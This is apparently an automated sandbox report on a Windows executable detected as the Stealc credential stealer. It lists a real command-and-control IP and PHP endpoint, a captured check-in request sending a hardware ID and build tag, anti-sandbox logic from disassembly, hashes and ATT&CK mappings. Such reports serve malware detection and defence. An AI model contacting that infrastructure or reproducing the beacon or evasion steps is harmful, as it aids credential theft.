                Source: Yara matchFile source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.910000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/true
                  		unknown
                  http://185.215.113.206/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/e2b1563c6670f193.php~file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/e2b1563c6670f193.php/file.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/lCfile.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/e2b1563c6670f193.phpPfile.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/e2b1563c6670f193.phpZfile.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206file.exe, 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                http://185.215.113.206/e2b1563c6670f193.phpFfile.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/wsfile.exe, 00000000.00000002.1786322649.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://185.215.113.206/DCBF360B3297E19BA487Rfile.exe, 00000000.00000002.1786322649.00000000006E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.215.113.206
                                      		unknownPortugal
                                      		206894WHOLESALECONNECTIONSNLtrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1542946
                                      Start date and time:2024-10-26 23:14:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 3m 15s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:1
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 19
                                      • Number of non-executed functions: 84
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated

                                      Warnings

                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: file.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.215.113.206file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206/e2b1563c6670f193.php

                                      Domains

                                      No context

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                      • 185.215.113.16
                                      file.exeGet hashmaliciousStealcBrowse
                                      • 185.215.113.206
                                      uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                                      • 185.215.113.217
                                      uLV6jN2BWh.dllGet hashmaliciousUnknownBrowse
                                      • 185.215.113.217
                                      mU3Ob2XcCt.dllGet hashmaliciousAmadeyBrowse
                                      • 185.215.113.217
                                      ZnPyVAOUBc.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                      • 185.215.113.217

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      No created / dropped files found

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.948760965439741
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'894'400 bytes
                                      MD5:aa9612d185f329e0f4b0a9525de3b0e1
                                      SHA1:21ad52db3ebef421c02c82070c1ee13ad6c03620
                                      SHA256:c732cac1942cf6a53dbad592bd7599b3410b8f9f090f79060ddd0f6e4d3abd6b
                                      SHA512:5df5ba18ba7a1ea921e3953859010712a776ea598a7e5f169716ccd0b68bf4ab57d8cb451f42277965b59e816f4664d1c4356726f7600837c464816c3c13aa66
                                      SSDEEP:24576:YfXvRRz5hHiz/kVRwNGGzmVeZtm9y/PwlB2HzVm/WbiWk87TyKQFgwfBN+VKnEli:8v5ikV2NGGzNHYeRk8frAPfqVvSYj
                                      TLSH:3895337E1DCCA3B1DDCE3275C36746C63325675383849477AEDAF122194322AE6788E8
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........

                                      File Icon

                                      Icon Hash:90cececece8e8eb0

                                      Static PE Info

                                      General

                                      Entrypoint:0xab3000
                                      Entrypoint Section:.taggant
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                                      Entrypoint Preview

                                      Instruction
                                      jmp 00007F0C444AF61Ah
                                      shufps xmm3, dqword ptr [eax+eax], 00h
                                      add byte ptr [eax], al
                                      add cl, ch
                                      add byte ptr [eax], ah
                                      add byte ptr [eax], al
                                      add byte ptr [ebx], cl
                                      or al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], dh
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, byte ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+00000000h], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      push es
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or ecx, dword ptr [edx]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      xor byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], cl
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      pop es
                                      add byte ptr [eax], 00000000h
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Rich Headers

                                      Programming Language:
                                      • [C++] VS2010 build 30319
                                      • [ASM] VS2010 build 30319
                                      • [ C ] VS2010 build 30319
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [LNK] VS2010 build 30319

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      0x10000x25b0000x22800b3a4623a5a41d471ad4ab5002d8f7da9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      0x25e0000x2ab0000x200d4bb3ff44d494b4923a05838297016e5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      qyeleazo0x5090000x1a90000x1a8600b505e6c864a009a20e6b9fad3a3b957fFalse0.99490058910162OpenPGP Public Key7.954246501393021IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      wadukluq0x6b20000x10000x400e9f32e65cba2d81a1ea24d67c4bad325False0.7919921875data6.142306036595887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .taggant0x6b30000x30000x2200571a11a25b4045e90c2656612ae7e227False0.0881204044117647DOS executable (COM)1.1210001164843297IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                      Imports

                                      DLLImport
                                      kernel32.dlllstrcpy

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-10-26T23:15:08.696725+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.20680TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 26, 2024 23:15:07.489938974 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:07.495389938 CEST8049730185.215.113.206192.168.2.4
                                      Oct 26, 2024 23:15:07.495501995 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:07.495707035 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:07.501000881 CEST8049730185.215.113.206192.168.2.4
                                      Oct 26, 2024 23:15:08.408919096 CEST8049730185.215.113.206192.168.2.4
                                      Oct 26, 2024 23:15:08.409006119 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:08.411416054 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:08.417409897 CEST8049730185.215.113.206192.168.2.4
                                      Oct 26, 2024 23:15:08.696441889 CEST8049730185.215.113.206192.168.2.4
                                      Oct 26, 2024 23:15:08.696724892 CEST4973080192.168.2.4185.215.113.206
                                      Oct 26, 2024 23:15:11.939229012 CEST4973080192.168.2.4185.215.113.206

                                      HTTP Request Dependency Graph

                                      • 185.215.113.206

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449730185.215.113.206807048C:\Users\user\Desktop\file.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 26, 2024 23:15:07.495707035 CEST90OUTGET / HTTP/1.1
                                      Host: 185.215.113.206
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Oct 26, 2024 23:15:08.408919096 CEST203INHTTP/1.1 200 OK
                                      Date: Sat, 26 Oct 2024 21:15:08 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 0
                                      Keep-Alive: timeout=5, max=100
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Oct 26, 2024 23:15:08.411416054 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAA
                                      Host: 185.215.113.206
                                      Content-Length: 209
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Data Raw: 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 39 43 39 34 31 35 34 36 39 36 39 36 36 30 36 35 39 30 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 41 2d 2d 0d 0a
                                      Data Ascii: ------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="hwid"3D9C9415469696606590------GCFIIEBKEGHJJJJJJDAAContent-Disposition: form-data; name="build"puma------GCFIIEBKEGHJJJJJJDAA--
                                      Oct 26, 2024 23:15:08.696441889 CEST210INHTTP/1.1 200 OK
                                      Date: Sat, 26 Oct 2024 21:15:08 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Content-Length: 8
                                      Keep-Alive: timeout=5, max=99
                                      Connection: Keep-Alive
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                      Data Ascii: YmxvY2s=


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:17:15:03
                                      Start date:26/10/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x910000
                                      File size:1'894'400 bytes
                                      MD5 hash:AA9612D185F329E0F4B0A9525DE3B0E1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786322649.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1745824943.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:8.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:24
                                        execution_graph 13424 9269f0 13469 912260 13424->13469 13448 926a64 13449 92a9b0 4 API calls 13448->13449 13450 926a6b 13449->13450 13451 92a9b0 4 API calls 13450->13451 13452 926a72 13451->13452 13453 92a9b0 4 API calls 13452->13453 13454 926a79 13453->13454 13455 92a9b0 4 API calls 13454->13455 13456 926a80 13455->13456 13621 92a8a0 13456->13621 13458 926a89 13459 926b0c 13458->13459 13462 926ac2 OpenEventA 13458->13462 13625 926920 GetSystemTime 13459->13625 13464 926af5 CloseHandle Sleep 13462->13464 13465 926ad9 13462->13465 13466 926b0a 13464->13466 13468 926ae1 CreateEventA 13465->13468 13466->13458 13468->13459 13822 9145c0 13469->13822 13471 912274 13472 9145c0 2 API calls 13471->13472 13473 91228d 13472->13473 13474 9145c0 2 API calls 13473->13474 13475 9122a6 13474->13475 13476 9145c0 2 API calls 13475->13476 13477 9122bf 13476->13477 13478 9145c0 2 API calls 13477->13478 13479 9122d8 13478->13479 13480 9145c0 2 API calls 13479->13480 13481 9122f1 13480->13481 13482 9145c0 2 API calls 13481->13482 13483 91230a 13482->13483 13484 9145c0 2 API calls 13483->13484 13485 912323 13484->13485 13486 9145c0 2 API calls 13485->13486 13487 91233c 13486->13487 13488 9145c0 2 API calls 13487->13488 13489 912355 13488->13489 13490 9145c0 2 API calls 13489->13490 13491 91236e 13490->13491 13492 9145c0 2 API calls 13491->13492 13493 912387 13492->13493 13494 9145c0 2 API calls 13493->13494 13495 9123a0 13494->13495 13496 9145c0 2 API calls 13495->13496 13497 9123b9 13496->13497 13498 9145c0 2 API calls 13497->13498 13499 9123d2 13498->13499 13500 9145c0 2 API calls 13499->13500 13501 9123eb 13500->13501 13502 9145c0 2 API calls 13501->13502 13503 912404 13502->13503 13504 9145c0 2 API calls 13503->13504 13505 91241d 13504->13505 13506 9145c0 2 API calls 13505->13506 13507 912436 13506->13507 13508 9145c0 2 API calls 13507->13508 13509 91244f 13508->13509 13510 9145c0 2 API calls 13509->13510 13511 912468 13510->13511 13512 9145c0 2 API calls 13511->13512 13513 912481 13512->13513 13514 9145c0 2 API calls 13513->13514 13515 91249a 13514->13515 13516 9145c0 2 API calls 13515->13516 13517 9124b3 13516->13517 13518 9145c0 2 API calls 13517->13518 13519 9124cc 13518->13519 13520 9145c0 2 API calls 13519->13520 13521 9124e5 13520->13521 13522 9145c0 2 API calls 13521->13522 13523 9124fe 13522->13523 13524 9145c0 2 API calls 13523->13524 13525 912517 13524->13525 13526 9145c0 2 API calls 13525->13526 13527 912530 13526->13527 13528 9145c0 2 API calls 13527->13528 13529 912549 13528->13529 13530 9145c0 2 API calls 13529->13530 13531 912562 13530->13531 13532 9145c0 2 API calls 13531->13532 13533 91257b 13532->13533 13534 9145c0 2 API calls 13533->13534 13535 912594 13534->13535 13536 9145c0 2 API calls 13535->13536 13537 9125ad 13536->13537 13538 9145c0 2 API calls 13537->13538 13539 9125c6 13538->13539 13540 9145c0 2 API calls 13539->13540 13541 9125df 13540->13541 13542 9145c0 2 API calls 13541->13542 13543 9125f8 13542->13543 13544 9145c0 2 API calls 13543->13544 13545 912611 13544->13545 13546 9145c0 2 API calls 13545->13546 13547 91262a 13546->13547 13548 9145c0 2 API calls 13547->13548 13549 912643 13548->13549 13550 9145c0 2 API calls 13549->13550 13551 91265c 13550->13551 13552 9145c0 2 API calls 13551->13552 13553 912675 13552->13553 13554 9145c0 2 API calls 13553->13554 13555 91268e 13554->13555 13556 929860 13555->13556 13827 929750 GetPEB 13556->13827 13558 929868 13559 929a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13558->13559 13562 92987a 13558->13562 13560 929af4 GetProcAddress 13559->13560 13561 929b0d 13559->13561 13560->13561 13563 929b46 13561->13563 13564 929b16 GetProcAddress GetProcAddress 13561->13564 13565 92988c 21 API calls 13562->13565 13566 929b68 13563->13566 13567 929b4f GetProcAddress 13563->13567 13564->13563 13565->13559 13568 929b71 GetProcAddress 13566->13568 13569 929b89 13566->13569 13567->13566 13568->13569 13570 929b92 GetProcAddress GetProcAddress 13569->13570 13571 926a00 13569->13571 13570->13571 13572 92a740 13571->13572 13573 92a750 13572->13573 13574 926a0d 13573->13574 13575 92a77e lstrcpy 13573->13575 13576 9111d0 13574->13576 13575->13574 13577 9111e8 13576->13577 13578 911217 13577->13578 13579 91120f ExitProcess 13577->13579 13580 911160 GetSystemInfo 13578->13580 13581 911184 13580->13581 13582 91117c ExitProcess 13580->13582 13583 911110 GetCurrentProcess VirtualAllocExNuma 13581->13583 13584 911141 ExitProcess 13583->13584 13585 911149 13583->13585 13828 9110a0 VirtualAlloc 13585->13828 13588 911220 13832 9289b0 13588->13832 13591 911249 __aulldiv 13592 91129a 13591->13592 13593 911292 ExitProcess 13591->13593 13594 926770 GetUserDefaultLangID 13592->13594 13595 926792 13594->13595 13596 9267d3 13594->13596 13595->13596 13597 9267a3 ExitProcess 13595->13597 13598 9267c1 ExitProcess 13595->13598 13599 9267b7 ExitProcess 13595->13599 13600 9267cb ExitProcess 13595->13600 13601 9267ad ExitProcess 13595->13601 13602 911190 13596->13602 13600->13596 13603 9278e0 3 API calls 13602->13603 13604 91119e 13603->13604 13605 9111cc 13604->13605 13606 927850 3 API calls 13604->13606 13609 927850 GetProcessHeap RtlAllocateHeap GetUserNameA 13605->13609 13607 9111b7 13606->13607 13607->13605 13608 9111c4 ExitProcess 13607->13608 13610 926a30 13609->13610 13611 9278e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13610->13611 